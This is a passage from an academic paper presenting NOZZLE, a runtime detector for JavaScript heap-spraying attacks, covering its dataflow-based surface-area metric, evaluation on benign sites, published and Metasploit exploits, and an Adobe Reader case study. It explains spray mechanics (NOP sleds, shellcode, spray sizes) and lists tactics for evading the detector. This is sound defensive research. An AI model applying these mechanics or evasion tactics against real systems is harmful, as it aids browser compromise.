The example shown in Figure 2 is modelled after a previously published heap-spraying exploit [44]. While we are only showing the JavaScript portion of the page, this payload would be typically embedded within an HTML page on the web. Once a victim visits the page, the JavaScript payload is automatically executed. Lines 2 allocates the shellcode into a string, while lines 3–8 of the JavaScript code are responsible for setting up the spraying NOP sled. Lines 10–13 create JavaScript objects each of which is the result of combining the sled with the shellcode. It is quite typical for published exploits to contain a long sled (256 KB in this case). Similarly, to increase the effectiveness of the attack, a large number of JavaScript objects are allocated on the heap, 1,000 in this case. Figure 10 in Section 5 provides more information on previously published exploits.

## 3 Overview

While type-safe languages such as Java, C#, and JavaScript reduce the opportunity for malicious attacks, heap-spraying attacks demonstrate that even a type-safe program can be manipulated to an attacker's advantage. Unfortunately, traditional signature-based pattern matching approaches used in the intrusion detection literature are not very effective when applied to detecting heap-spraying attacks. This is because in a language as flexible as JavaScript it is easy to hide the attack code by either using encodings or making it polymorphic; in fact, most JavaScript worms observed in the wild use some form of encoding to disguise themselves [19, 34]. As a result, effective detection techniques typically are not syntactic. They are performed at runtime and employ some level of semantic analysis or runtime interpretation. Hardware support has even been provided to address this problem, with widely used architectures supporting a "no-execute bit", which prevents a process from executing code on specific pages in its address space [21]. We dis-




Figure 3: NOZZLE system architecture.

cuss how NOZZLE complements existing hardware solutions in Section 7. In this paper, we consider systems that use the x86 instruction set architecture (ISA) running the Windows operating system, a ubiquitous platform that is a popular target for attackers.

### 3.1 Lightweight Interpretation

Unlike previous security attacks, a successful heap-spraying attack has the property that the attack influences the contents of a large fraction of the heap. We propose a two-level approach to detecting such attacks: scanning objects locally while at the same time maintaining heap health metrics globally.

At the individual object level, NOZZLE performs lightweight interpretation of heap-allocated objects, treating them as though they were code. This allows us to recognize potentially unsafe code by interpreting it within a safe environment, looking for malicious intent.

The NOZZLE lightweight emulator scans heap objects to identify valid x86 code sequences, disassembling the code and building a control flow graph [35]. Our analysis focuses on detecting the NOP sled, which is somewhat of a misnomer. The sled can be composed of arbitrary instructions (not just NOPs) as long as the effect they have on registers, memory, and the rest of the machine state do not terminate execution or interfere with the actions of the shellcode. Because the code in the sled is intended to be the target of a misdirected jump, and thus has to be executable, the attacker cannot hide the sled with encryption or any means that would prevent the code from executing. In our analysis, we exploit the fundamental nature of the sled, which is to direct control flow specifically to the shellcode, and use this property as a means of detecting it. Furthermore, our method does not require detecting or assume there exists a definite partition between the shellcode and the NOP sled.

Because the attack jump target cannot be precisely controlled, the emulator follows control flow to identify basic blocks that are likely to be reached through jumps from multiple offsets into the object. Our local detection process has elements in common with published methods for sled detection in network packet processing [4, 16, 31, 43]. Unfortunately, the density of the x86 instruction set makes the contents of many objects look like executable code, and as a result, published methods lead to high false positive rates, as demonstrated in Section 5.1.

We have developed a novel approach to mitigate this problem using global heap health metrics, which effectively distinguishes benign allocation behavior from malicious attacks. Fortunately, an inherent property of heap-spraying attacks is that such attacks affect the heap globally. Consequently, NOZZLE exploits this property to drastically reduce the false positive rate.

### 3.2 Threat Model

We assume that the attacker has access to memory vulnerabilities for commonly used browsers and also can lure users to a web site whose content they control. This provides a delivery mechanism for heap spraying exploits. We assume that the attacker does not have further access to the victim's machine and the machine is otherwise uncompromised. However, the attacker does *not* control the precise location of any heap object.

We also assume that the attacker knows about the NOZZLE techniques and will try to avoid detection. They may have access to the browser code and possess detailed knowledge of system-specific memory layout properties

such as object alignment. There are specific potential weaknesses that NOZZLE has due to the nature of its runtime, statistical approach. These include time-of-check to time-of-use vulnerabilities, the ability of the attacker to target their attack under NOZZLE's thresholds, and the approach of inserting junk bytes at the start of objects to avoid detection. We consider these vulnerabilities carefully in Section 6, after we have presented our solution in detail.

| | | |
|---|---|---|
| Semi-lattice | $L$ | bitvectors of length $N$ |
| Top | $\top$ | $\bar{1}$ |
| Initial value | $init(B_i)$ | $\bar{0}$ |
| Transfer function | $TF(B_i)$ | $0 \ldots 010 \ldots 0$ ($i$th bit set) |
| Meet operator | $\wedge(x, y)$ | $x \vee y$ (bitwise or) |
| Direction | | *forward* |

Figure 4: Dataflow problem parametrization for computing the surface area (see Aho et al.).

# 4 Design and Implementation

In this section, we formalize the problem of heap spray detection, provide improved algorithms for detecting suspicious heap objects, and describe the implementation of NOZZLE.

## 4.1 Formalization

This section formalizes our detection scheme informally described in Section 3.1, culminating in the notion of a *normalized attack surface*, a heap-global metric that reflects the overall heap exploitability and is used by NOZZLE to flag potential attacks.

**Definition 1.** *A sequence of bytes is* legitimate*, if it can be decoded as a sequence of valid x86 instructions. In a variable length ISA this implies that the processor must be able to decode every instruction of the sequence. Specifically, for each instruction, the byte sequence consists of a valid opcode and the correct number of arguments for that instruction.*

Unfortunately, the x86 instruction set is quite dense, and as a result, much of the heap data can be interpreted as legitimate x86 instructions. In our experiments, about 80% of objects allocated by Mozilla Firefox contain byte sequences that can be interpreted as x86 instructions.

**Definition 2.** *A* valid instruction sequence *is a legitimate instruction sequence that does* not *include instructions in the following categories:*

- *I/O or system calls (*`in`*,* `outs`*, etc)*
- *interrupts (*`int`*)*
- *privileged instructions (*`hlt`*,* `ltr`*)*
- *jumps outside of the current object address range.*

These instructions either divert control flow out of the object's implied control flow graph or generate exceptions and terminate (privileged instructions). If they appear in a path of the NOP sled, they prevent control flow from reaching the shellcode via that path. When these instructions appear in the shellcode, they do not hamper the control flow in the NOP sled leading to that shellcode in any way.

Previous work on NOP sled detection focuses on examining possible attacks for properties like valid instruction sequences [4, 43]. We use this definition as a basic object filter, with results presented in Section 5.1. Using this approach as the sole technique for detecting attacks leads to an unacceptable number of false positives, and more selective techniques are necessary.

To improve our selectivity, NOZZLE attempts to discover objects in which control flow through the object (the NOP sled) frequently reaches the same basic block(s) (the shellcode, indicated in Figure 1), the assumption being that an attacker wants to arrange it so that a random jump into the object will reach the shellcode with the greatest probability.

Our algorithm constructs a control flow graph (CFG) by interpreting the data in an object at offset $\Delta$ as an instruction stream. For now, we consider this offset to be zero and discuss the implications of malicious code injected at a different starting offset in Section 6. As part of the construction process, we mark the basic blocks in the CFG as valid and invalid instruction sequences, and we modify the definition of a basic block so that it terminates when an invalid instruction is encountered. A block so terminated is considered an invalid instruction sequence. For every basic block within the CFG we compute the *surface area*, a proxy for the likelihood of control flow passing through the basic block, should the attacker jump to a random memory address within the object.

**Algorithm 1. Surface area computation.**

**Inputs:** *Control flow graph $C$ consisting of*

- *Basic blocks $B_1, \ldots, B_N$*
- *Basic block weights, $\bar{W}$, a single-column vector of size $N$ where element $W_i$ indicates the size of block $B_i$ in bytes*
- *A validity bitvector $\bar{V}$, a single-row bitvector whose $i$th element is set to one only when block $B_i$ contains a valid instruction sequence and set to zero otherwise.*
- *$MASK_1, \ldots, MASK_N$, where $MASK_i$ is a single-row bitvector of size $N$ where all the bits are one except at the $i^{th}$ position where the bit is zero.*




Figure 5: Semi-lattice used in Example 1.

**Outputs:** *Surface area for each basic block* $SA(B_i), B_i \in C$.

**Solution:** We define a parameterized dataflow problem using the terminology in Aho et al. [2], as shown in Figure 4. We also relax the definition of a conventional basic block; whenever an invalid instruction is encountered, the block prematurely terminates. The goal of the dataflow analysis is to compute the reachability between basic blocks in the control graph inferred from the contents of the object. Specifically, we want to determine whether control flow could possibly pass through a given basic block if control starts at each of the other $N-1$ blocks. Intuitively, if control reaches a basic block from many of the other blocks in the object (demonstrating a "funnel" effect), then that object exhibits behavior consistent with having a NOP sled and is suspicious.

**Dataflow analysis details:** The dataflow solution computes $out(B_i)$ for every basic block $B_i \in C$. $out(B_i)$ is a bitvector of length N, with one bit for each basic block in the control flow graph. The meaning of the bits in $out(B_i)$ are as follows: the bit at position $j$, where $j \neq i$ indicates whether a possible control path exists starting at block $j$ and ending at block $i$. The bit at position $i$ in $B_i$ is always one. For example, in Figure 6, a path exists between block 1 and 2 (a fallthrough), and so the first bit of $out(B_2)$ is set to 1. Likewise, there is no path from block 6 to block 1, so the sixth bit of $out(B_1)$ is zero.

The dataflow algorithm computes $out(B_i)$ for each $B_i$ by initializing them, computing the contribution that each basic block makes to $out(B_i)$, and propagating intermediate results from each basic block to its successors (because this is a forward dataflow computation). When results from two predecessors need to be combined at a join point, the meet operator is used (in this case a simple bitwise or). The dataflow algorithm iterates the forward propagation until the results computed for each $B_i$ do not change further. When no further changes occur, the final values of $out(B_i)$ have been computed. The iterative algorithm for this forward dataflow problem is guaranteed to terminate in no more than the number of steps equal to the product of the semi-lattice height and the number of basic blocks in the control flow graph [2].




Figure 6: The control flow graph for Example 1.

Having calculated $out(B_i)$, we are now ready to compute the surface area of the basic block $B_i$. The surface area of a given block is a metric that indicates how likely the block will be reached given a random control flow landing on this object. The surface area of basic block $B_i$, $SA(B_i)$, is computed as follows:

$$SA(B_i) = (out(B_i) \wedge \bar{V} \wedge MASK_i) \cdot \bar{W}$$

where $out(B_i)$ is represented by a bitvector whose values are computed using the iterative dataflow algorithm above. $\bar{V}$, $\bar{W}$, and $MASK_i$ are the algorithm's inputs. $\bar{V}$ is determined using the validity criteria mentioned above, while $\bar{W}$ is the size of each basic block in bytes. $MASK_i$ is used to mask out the contribution of $B_i$'s weight to its own surface area. The intuition is that we discard the contribution from the block itself as well as other basic blocks that are not valid instruction sequences by logically bitwise ANDing $out(B_i)$, $\bar{V}$, and $MASK_i$. Because the shellcode block does not contribute to actual attack surface (since a jump inside the shellcode is not likely to result in a successful exploit), we do not include the weight of $B_i$ as part of the attack surface. Finally, we perform vector multiplication to account for the weight each basic block contributes—or does not—to the surface area of $B_i$.

In summary, the surface area computation based on the dataflow framework we described accounts for the contribution each basic block, through its weight and validity,

has on every other blocks reachable by it. Our computation method can handle code with complex control flow involving arbitrary nested loops. It also allows for the discovery of malicious objects even if the object has no clear partition between the NOP sled and the shellcode itself.

**Complexity analysis.** The standard iterative algorithm for solving dataflow problems computes $out(B_i)$ values with an average complexity bound of $O(N)$. The only complication is that doing the lattice meet operation on bitvectors of length $N$ is generally an $O(N)$ and *not a constant time* operation. Luckily, for the majority of CFGs that arise in practice — 99.08% in the case of Mozilla Firefox opened and interacted on `www.google.com` — the number of basic blocks is fewer than 64, which allows us to represent dataflow values as long integers on 64-bit hardware. For those rare CFGs that contain over 64 basic blocks, a generic bitvector implementation is needed.

**Example 1** Consider the CFG in Figure 6. The semi-lattice for this CFG of size 6 is partially shown in Figure 5. Instructions in the CFG are color-coded by instruction type. In particular, system calls and I/O instructions interrupt the normal control flow. For simplicity, we show $\bar{W}_i$ as the number of instructions in each block, instead of the number of bytes. The values used and produced by the algorithm are summarized in Figure 7. The $out'(B_i)$ column shows the intermediate results for dataflow calculation after the first pass. The final solution is shown in the $out(B_i)$ column. □

Given the surface area of individual blocks, we compute the *attack surface area* of object o as:

$$SA(o) = max(SA(B_i), B_i \in C)$$

For the entire heap, we accumulate the attack surface of the individual objects.

**Definition 3.** *The* attack surface area *of heap $H$, $SA(H)$, containing objects $o_1, \ldots, o_n$ is defined as follows:*

$$\sum_{i=1,\ldots,n} SA(o_i)$$

**Definition 4.** *The* normalized attack surface area *of heap $H$, denoted as $NSA(H)$, is defined as: $SA(H)/|H|$.*

The normalized attack surface area metric reflects the overall heap "health" and also allows us to adjust the frequency with which NOZZLE runs, thereby reducing the runtime overhead, as explained below.

## 4.2 Nozzle Implementation

NOZZLE needs to periodically scan heap object content in a way that is analogous to a garbage collector mark phase. By instrumenting allocation and deallocation routines, we maintain a table of live objects that are later scanned asynchronously, on a different NOZZLE thread.

We adopt garbage collection terminology in our description because the techniques are similar. For example, we refer to the threads allocating and freeing objects as the mutator threads, while we call the NOZZLE threads scanning threads. While there are similarities, there are also key differences. For example, NOZZLE works on an unmanaged, type-unsafe heap. If we had garbage collector write barriers, it would improve our ability to address the TOCTTOU (time-of-check to time-of-use) issue discussed in Section 6.

### 4.2.1 Detouring Memory Management Routines

We use a binary rewriting infrastructure called Detours [14] to intercept functions calls that allocate and free memory. Within Mozilla Firefox these routines are `malloc`, `calloc`, `realloc`, and `free`, defined in `MOZCRT19.dll`. To compute the surface area, we maintain information about the heap including the total size of allocated objects.

NOZZLE maintains a hash table that maps the addresses of currently allocated objects to information including size, which is used to track the current size and contents of the heap. When objects are freed, we remove them from the hash table and update the size of the heap accordingly. Note that if NOZZLE were more closely integrated into the heap allocator itself, this hash table would be unnecessary.

NOZZLE maintains an ordered work queue that serves two purposes. First, it is used by the scanning thread as a source of objects that need to be scanned. Second, NOZZLE waits for objects to mature before they are scanned, and this queue serves that purpose. Nozzle only considers objects of size greater than 32 bytes to be put in the work queue as the size of any harmful shellcode is usually larger than this

To reduce the runtime overhead of NOZZLE, we randomly sample a subset of heap objects, with the goal of covering a fixed fraction of the total heap. Our current sampling technique is based on sampling by object, but as our results show, an improved technique would base sampling frequency on bytes allocated, as some of the published attacks allocate a relatively small number of large objects.

### 4.2.2 Concurrent Object Scanning

We can reduce the performance impact of object scanning, especially on multicore hardware, with the help of multiple scanning threads. As part of program detouring, we rewrite the `main` function to allocate a pool of $N$ scanning threads to be used by NOZZLE, as shown in Figure 2.

| $B_i$ | $TF(B_i)$ | $\bar{V}_i$ | $\bar{W}_i$ | $out'(B_i)$ | $out(B_i)$ | $out(B_i) \wedge \bar{V} \wedge MASK_i$ | $SA(B_i)$ |
|---|---|---|---|---|---|---|---|
| 1 | 100000 | 1 | 4 | 100000 | 111110 | 011010 | 8 |
| 2 | 010000 | 1 | 2 | 110000 | 111110 | 101010 | 10 |
| 3 | 001000 | 1 | 4 | 111000 | 111110 | 110010 | 8 |
| 4 | 000100 | 0 | 3 | 110100 | 111110 | 111010 | 12 |
| 5 | 000010 | 1 | 2 | 111110 | 111110 | 111000 | 10 |
| 6 | 000001 | 0 | 2 | 111111 | 111111 | 111010 | 12 |

Figure 7: Dataflow values for Example 1.

This way, a mutator only blocks long enough when allocating and freeing objects to add or remove objects from a per-thread work queue.

The task of object scanning is subdivided among the scanning threads the following way: for an object at address $a$, thread number

$$(a>>p) \% N$$

is responsible for both maintaining information about that object and scanning it, where $p$ is the number of bits required to encode the operating system page size (typically 12 on Windows). In other words, to preserve the spatial locality of heap access, we are distributing the task of scanning *individual pages* among the $N$ threads. Instead of maintaining a global hash table, each thread maintains a local table keeping track of the sizes for the objects it handles.

Object scanning can be triggered by a variety of events. Our current implementation scans objects once, after a fixed delay of one object allocation (i.e., we scan the previously allocated object when we see the next object allocated). This choice works well for JavaScript, where string objects are immutable, and hence initialized immediately after they are allocated. Alternately, if there are extra cores available, scanning threads could pro-actively rescan objects without impacting browser performance and reducing TOCTTOU vulnerabilities (see Section 6).

### 4.3 Detection and Reporting

NOZZLE maintains the values $NSA(H)$ and $SA(H)$ for the currently allocated heap $H$. The criteria we use to conclude that there is an attack in progress combines an absolute and a relative threshold:

$$(NSA(H) > th_{norm}) \wedge (SA(H) > th_{abs})$$

When this condition is satisfied, we warn the user about a potential security attack in progress and allow them to kill the browser process. An alternative would be to take advantage of the error reporting infrastructure built into modern browsers to notify the browser vendor.




Figure 8: Global normalized attack surface for economist.com versus a published exploit (612).

These thresholds are defined based on a comparison of benign and malicious web pages (Section 5.1). The guiding principle behind the threshold determination is that for the attacker to succeed, the exploit needs to be effective with reasonable probability. For the absolute threshold, we choose five megabytes, which is roughly the size of the Firefox heap when opening a blank page. A real attack would need to fill the heap with at least as many malicious objects, assuming the attacker wanted the ratio of malicious to non-malicious objects to be greater than 50%.

## 5 Evaluation

The bulk of our evaluation focuses on applying NOZZLE to the Firefox web browser. Section 5.5 talks about using NOZZLE to protect Adobe Acrobat Reader.

We begin our evaluation by showing what a heap-spraying attack looks like as measured using our normalized attack surface metric. Figure 8 shows the attack surface area of the heap for two web sites: a benign site (economist.com), and a site with a published heap-spraying attack, similar to the one presented in Figure 2. Figure 8 illustrates how distinctive a heap-spraying attack

is when viewed through the normalized attack surface filter. The success of NOZZLE depends on its ability to distinguish between these two kinds of behavior. After seeing Figure 8, one might conclude that we can detect heap spraying activity based on how rapidly the heap grows. Unfortunately, benign web sites as `economist.com` can possess as high a heap growth rate as a rogue page performing heap spraying. Moreover, unhurried attackers may avoid such detection by moderating the heap growth rate of their spray. In this section, we present the false positive and false negative rate of NOZZLE, as well as its performance overhead, demonstrating that it can effectively distinguish benign from malicious sites.

For our evaluations, we collected 10 heavily-used benign web sites with a variety of content and levels of scripting, which we summarize in Figure 9. We use these 10 sites to measure the false positive rate and also the impact of NOZZLE on browser performance, discussed in Section 5.3. In our measurements, when visiting these sites, we interacted with the site as a normal user would, finding a location on a map, requesting driving directions, etc. Because such interaction is hard to script and reproduce, we also studied the false positive rate of NOZZLE using a total of 150 benign web sites, chosen from the most visited sites as ranked by Alexa [5][1]. For these sites, we simply loaded the first page of the site and measured the heap activity caused by that page alone.

To evaluates NOZZLE's ability to detect malicious attacks, we gathered 12 published heap-spraying exploits, summarized in Figure 10. We also created 2,000 synthetically generated exploits using the Metasploit framework [12]. Metasploit allows us to create many malicious code sequences with a wide variety of NOP sled and shellcode contents, so that we can evaluate the ability of our algorithms to detect such attacks. Metasploit is parameterizable, and as a result, we can create attacks that contain NOP sleds alone, or NOP sleds plus shellcode. In creating our Metasploit exploits, we set the ratio of NOP sled to shellcode at 9:1, which is quite a low ratio for a real attack but nevertheless presents no problems for NOZZLE detection.

## 5.1 False Positives

To evaluate the false positive rate, we first consider using NOZZLE as a global detector determining whether a heap is under attack, and then consider the false-positive rate of NOZZLE as a local detector that is attempting to detect individual malicious objects. In our evaluation, we compare NOZZLE and STRIDE [4], a recently published local detector.

[1] Our tech report lists the full set of sites used [32].

| Site URL | Download (kilobytes) | JavaScript (kilobytes) | Load time (seconds) |
|---|---|---|---|
| `economist.com` | 613 | 112 | 12.6 |
| `cnn.com` | 885 | 299 | 22.6 |
| `yahoo.com` | 268 | 145 | 6.6 |
| `google.com` | 25 | 0 | 0.9 |
| `amazon.com` | 500 | 22 | 14.8 |
| `ebay.com` | 362 | 52 | 5.5 |
| `facebook.com` | 77 | 22 | 4.9 |
| `youtube.com` | 820 | 160 | 16.5 |
| `maps.google.com` | 285 | 0 | 14.2 |
| `maps.live.com` | 3000 | 2000 | 13.6 |

Figure 9: Summary of 10 benign web sites we used as NOZZLE benchmarks.

| Date | Browser | Description | milw0rm |
|---|---|---|---|
| 11/2004 | IE | IFRAME Tag BO | 612 |
| 04/2005 | IE | DHTML Objects Corruption | 930 |
| 01/2005 | IE | .ANI Remote Stack BO | 753 |
| 07/2005 | IE | `javaprxy.dll` COM Object | 1079 |
| 03/2006 | IE | `createTextRang` RE | 1606 |
| 09/2006 | IE | VML Remote BO | 2408 |
| 03/2007 | IE | ADODB Double Free | 3577 |
| 09/2006 | IE | WebViewFolderIcon `setSlice` | 2448 |
| 09/2005 | FF | 0xAD Remote Heap BO | 1224 |
| 12/2005 | FF | `compareTo()` RE | 1369 |
| 07/2006 | FF | `Navigator` Object RE | 2082 |
| 07/2008 | Safari | Quicktime Content-Type BO | 6013 |

Figure 10: Summary of information about 12 published heap-spraying exploits. BO stands for "buffer overruns" and RE stands for "remote execution."

### 5.1.1 Global False Positive Rate

Figure 11 shows the maximum normalized attack surface measured by NOZZLE for our 10 benchmark sites (top) as well as the top 150 sites reported by Alexa (bottom). From the figure, we see that the maximum normalized attack surface remains around 6% for most of the sites, with a single outlier from the 150 sites at 12%. In practice, the median attack surface is typically much lower than this, with the maximum often occurring early in the rendering of the page when the heap is relatively small. The `economist.com` line in Figure 8 illustrates this effect. By setting the spray detection threshold at 15% or above, we would observe no false positives in any of the sites measured.

### 5.1.2 Local False Positive Rate

In addition to being used as a heap-spray detector, NOZZLE can also be used locally as a malicious object detector. In this use, as with existing NOP and shellcode detectors such as STRIDE [4], a tool would report an object as potentially malicious if it contained data that could be interpreted as code, and had other suspicious properties. Previous work in this area focused on detection of malware in network packets and URIs, whose content is very different than heap objects. We evaluated NOZZLE




Figure 11: Global normalized attack surface for 10 benign benchmark web sites and 150 additional top Alexa sites, sorted by increasing surface. Each element of the X-axis represents a different web site.




Figure 12: Local false positive rate for 10 benchmark web sites using NOZZLE and STRIDE. Improved STRIDE is a version of STRIDE that uses additional instruction-level filters, also used in NOZZLE, to reduce the false positive rate.

and STRIDE algorithm, to see how effective they are at classifying benign heap objects.

Figure 12 indicates the false positive rate of two variants of STRIDE and a simplified variant of NOZZLE. This simplified version of NOZZLE only scans a given heap object and attempts to disassemble and build a control flow graph from its contents. If it succeeds in doing this, it considers the object suspect. This version does not include any attack surface computation. The figure shows that, unlike previously reported work where the false positive rate for URIs was extremely low, the false positive rate for heap objects is quite high, sometimes above 40%. An improved variant of STRIDE that uses more information about the x86 instruction set (also used in NOZZLE) reduces this rate, but not below 10% in any case. We con-




Figure 13: Distribution of filtered object surface area for each of 10 benchmark web sites (benign) plus 2,000 synthetic exploits (see Section 5.2). Objects measured are only those that were considered valid instruction sequences by NOZZLE (indicated as false positives in Figure 12.

clude that, unlike URIs or the content of network packets, heap objects often have contents that can be entirely interpreted as code on the x86 architecture. As a result, existing methods of sled detection do not directly apply to heap objects. We also show that even NOZZLE, without incorporating our surface area computation, would have an unacceptably high false positive rate.

To increase the precision of a local detector based on NOZZLE, we incorporate the surface area calculation described in Section 4. Figure 13 indicates the distribution of measured surface areas for the roughly 10% of objects in Figure 12 that our simplified version of NOZZLE was not able to filter. We see from the figure that many of those objects have a relatively small surface area, with less that 10% having surface areas from 80-100% of the size of the object (the top part of each bar). Thus, roughly 1% of objects allocated by our benchmark web sites qualify as suspicious by a local NOZZLE detector, compared to roughly 20% using methods reported in prior work. Even at 1%, the false positive rate of a local NOZZLE detector is too high to raise an alarm whenever a single instance of a suspicious object is observed, which motivated the development of our global heap health metric.

## 5.2 False Negatives

As with the false positive evaluation, we can consider NOZZLE both as a local detector (evaluating if NOZZLE is capable of classifying a known malicious object correctly), and as a global detector, evaluating whether it correctly detects web pages that attempt to spray many copies of malicious objects in the heap.

Figure 14 evaluates how effective NOZZLE is at avoid-

| Configuration | min | mean | std |
|---|---|---|---|
| Local, NOP w/o shellcode | 0.994 | 0.997 | 0.002 |
| Local, NOP with shellcode | 0.902 | 0.949 | 0.027 |

Figure 14: Local attack surface metrics for 2,000 generated samples from Metasploit with and without shellcode.

| Configuration | min | mean | std |
|---|---|---|---|
| Global, published exploits | 0.892 | 0.966 | 0.028 |
| Global, Metasploit exploits | 0.729 | 0.760 | 0.016 |

Figure 15: Global attack surface metrics for 12 published attacks and 2,000 Metasploit attacks integrated into web pages as heap sprays.




Figure 16: Relative execution overhead of using NOZZLE in rendering a typical page of 10 benchmark web sites as a function of sampling frequency.

ing local false negatives using our Metasploit exploits. The figure indicates the mean and standard deviation of the object surface area over the collection of 2,000 exploits, both when shellcode is included with the NOP sled and when the NOP sled is measured alone. The figure shows that NOZZLE computes a very high attack surface in both cases, effectively detecting all the Metasploit exploits both with and without shellcode.

Figure 15 shows the attack surface statistics when using NOZZLE as a global detector when the real and synthetic exploits are embedded into a web page as a heap-spraying attack. For the Metasploit exploits which were not specifically generated to be heap-spraying attacks, we wrote our own JavaScript code to spray the objects in the heap. The figure shows that the published exploits are more aggressive than our synthetic exploits, resulting in a mean global attack surface of 97%. For our synthetic use of spraying, which was more conservative, we still measured a mean global attack surface of 76%. Note that if we set the NOP sled to shellcode at a ratio lower than 9:1, we will observe a correspondingly smaller value for the mean global attack surface. All attacks would be detected by NOZZLE with a relatively modest threshold setting of 50%. We note that these exploits have global attack surface metrics 6–8 times larger than the maximum measured attack surface of a benign web site.

### 5.3 Performance

To measure the performance overhead of NOZZLE, we cached a typical page for each of our 10 benchmark sites. We then instrument the start and the end of the page with the JavaScript `newDate().getTime()` routine and compute the delta between the two. This value gives us how long it takes to load a page in milliseconds. We collect our measurements running Firefox version 2.0.0.16 on a 2.4 GHz Intel Core2 E6600 CPU running Windows XP Service Pack 3 with 2 gigabytes of main memory. To minimize the effect of timing due to cold start disk I/O, we first load a page and discard the timing measurement. After this first trial, we take three measurements and present the median of the three values. The experiments were performed on an otherwise quiescent machine and the variance between runs was not significant.

In the first measurement, we measured the overhead of NOZZLE without leveraging an additional core, i.e., running NOZZLE as a single thread and, hence, blocking Firefox every time a memory allocation occurs. The resulting overhead is shown in Figure 16, both with and without sampling. The overhead is prohibitively large when no sampling is applied. On average, the no sampling approach incurs about 4X slowdown with as much as 13X slowdown for `maps.live.com`. To reduce this overhead, we consider the sampling approach. For these results, we sample based on object counts; for example, sampling at 5% indicates that one in twenty objects is sampled. Because a heap-spraying attack has global impact on the heap, sampling is unlikely to significantly reduce our false positive and false negative rates, as we show in the next section. As we reduce the sampling frequency, the overhead becomes more manageable. We see an average slowdown of about 60%, 20% and 10% for sampling frequency of 25%, 10% and 5%, respectively, for the 10 selected sites.

For the second measurement, taking advantage of the second core of our dual core machine, we configured NOZZLE to use one additional thread for scanning, hence, unblocking Firefox when it performs memory allocation. Figure 17 shows the performance overhead of NOZZLE with parallel scanning. From the Figure, we see that with no sampling, the overhead of using NOZZLE ranges from 30% to almost a factor of six, with a geometric mean of




Figure 17: Overhead of using NOZZLE on a dual-core machine.




Figure 18: Average error rate due to sampling of the computed average surface area for 10 benign benchmark web sites.

two times slowdown. This is a significant improvement over the serial version. When we further reduce the sampling rate, we see further performance improvement as with the first measurement. Reducing the sampling rate to 25%, the mean overhead drops to 45%, while with a sampling rate of 5%, the performance overhead is only 6.4%.

## 5.4 Impact of Sampling on Detection

In this section, we show the impact of sampling on the amount of error in the computation of the attack surface metric for both benign and malicious inputs.

Figure 18 shows the error rate caused by different levels of sampling averaged across the 10 benign web sites. We compute the error rate $E = |Sampled - Unsampled|/Unsampled$. The figure shows that for sample rates of 0.1% or above the error rate is less than 30%. To make this concrete, for a benign website, instead of calculating the normalized attack surface correctly as 5%, with a 0.1% sampling rate, we would instead calculate the normalized attack surface as 6.5%, still far below any threshold we might use for signaling an attack. Noting that the malicious pages have attack surfaces that are 6–8 times larger than benign web pages, we conclude that sampling even at 5% is unlikely to result in significant numbers of false positives.

| | Sampling Rate | | | | |
|---|---|---|---|---|---|
| | 100% | 25% | 10% | 5% | 1% |
| 12 Published | 0 | 0 | 0 | 0 | 50% |
| 2,000 Metasploit | 0 | 0 | 0 | 0 | 0 |

Figure 19: False negative rate for 12 real and 2,000 Metasploit attacks given different object sampling rates.

In Figure 19, we show the impact of sampling on the number of false negatives for our published and synthetic exploits. Because existing exploits involve generating the heap spray in a loop, the only way sampling will miss such an attack is to sample at such a low rate that the objects allocated in the loop escape notice. The figure illustrates that for published attacks sampling even at 5% results in no false negatives. At 1%, because several of the published exploits only create on the order of tens of copies of very large spray objects, sampling based on object count can miss these objects, and we observe a 50% (6/12) false negative rate. Sampling based on bytes allocated instead of objects allocated would reduce this false negative rate to zero.

## 5.5 Case Study: Adobe Reader Exploit

In February 2009, a remote code execution vulnerability was discovered in Adobe Acrobat and Adobe Reader [26]. The attack, which is still active on the Internet as of the time of this writing, exploited an integer overflow error and was facilitated by a JavaScript heap spray. Without making any modifications to NOZZLE, we used Detours to instrument the commercially-distributed binary of Adobe Reader 9.1.0 (`acrord32.exe`) with NOZZLE. The instrumentation allowed us to monitor the memory allocations being performed by the embedded JavaScript engine and detect possible spraying attacks. To test whether NOZZLE would detect this new attack, we embedded the heap spraying part of the published attack [6], disabling the JavaScript that caused the integer overflow exploit.

NOZZLE correctly detected this heap spraying attack, determining that the attack surface of the heap was greater than 94% by the time the heap spray was finished. No modifications were made either to the NOZZLE implementation or the surface area calculation to enable NOZZLE to detect this attack, which gives us confidence that NOZZLE is capable of protecting a wide range of software, going well beyond just web browsers.

To facilitate overhead measurements, we created a large document by concatenating six copies of the ECMA 262 standard — a 188-page PDF document [11] — with itself. The resulting document was 1,128 pages long and took 4,207 kilobytes of disk space. We added scripting code to the document to force Adobe Reader to "scroll" through this large document, rendering every page sequentially. We believe this workload to be representative of typical Adobe Reader usage, where the user pages through the document, one page at a time.

We measured the overhead of NOZZLE running in Adobe Reader on an Intel Core 2 2.4 GHz computer with 4 GB of memory running Windows Vista SP1. We measured elapsed time for Adobe Reader with and without NOZZLE on a lightly loaded computer and averaged five measurements with little observed variation. Without NOZZLE, Adobe Reader took an average of 18.7 seconds to render all the pages, and had a private working set of 18,772 kilobytes as measured with the Windows Task Manager. With a sampling rate set to 10% and multiprocessor scanning disabled, Adobe Reader with NOZZLE took an average of 20.2 seconds to render the pages, an average CPU overhead of 8%. The working set of Adobe Reader with NOZZLE average 31,849 kilobytes, an average memory overhead of 69%. While the memory overhead is high, as mentioned, we anticipate that this overhead could easily be reduced by integrating NOZZLE more closely with the underlying memory manager.

# 6 Limitations of NOZZLE

This section discusses assumptions and limitations of the current version of NOZZLE. In summary, assuming that the attackers are fully aware of the NOZZLE internals, there are a number of ways to evade its detection.

- As NOZZLE scans objects at specific times, an attacker could determine that an object has been scanned and arrange to put malicious content into the object only *after* it has been scanned (a TOCTTOU vulnerability).
- As NOZZLE currently starts scanning each object at offset zero, attackers can avoid detection by writing the first few bytes of the malicious object with a series of uninterpretable opcodes.
- Since NOZZLE relies on the use of a threshold for detection, attackers can populate the heap with fewer malicious objects to stay just under the detection threshold.
- Attackers can find ways to inject the heap with sprays that do not require large NOP sleds. For example, sprays with jump targets that are at fixed offsets in every sprayed page of memory are possible [39].
- Attackers can confuse NOZZLE's surface area measurement by designing attacks that embed multiple shellcodes within the same object or contain cross-object jumps.

Below we discuss these issues, their implications, and possible ways to address them.

## 6.1 Time-of-check to Time-of-use

Because NOZZLE examines object contents only at specific times, this leads to a potential time-of-check to time-of-use (TOCTTOU) vulnerability. An attacker aware that NOZZLE was being used could allocate a benign object, wait until NOZZLE scans it, and then rapidly change the object into a malicious one before executing the attack.

